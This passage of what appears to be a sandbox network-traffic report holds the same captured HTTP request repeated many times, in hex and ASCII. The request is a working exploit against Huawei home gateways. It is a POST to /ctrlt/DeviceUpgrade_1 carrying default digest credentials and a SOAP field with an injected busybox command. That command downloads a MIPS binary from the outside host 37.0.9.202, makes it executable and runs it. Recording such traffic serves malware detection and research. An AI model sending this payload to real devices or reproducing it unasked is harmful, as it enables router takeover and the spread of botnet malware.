6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
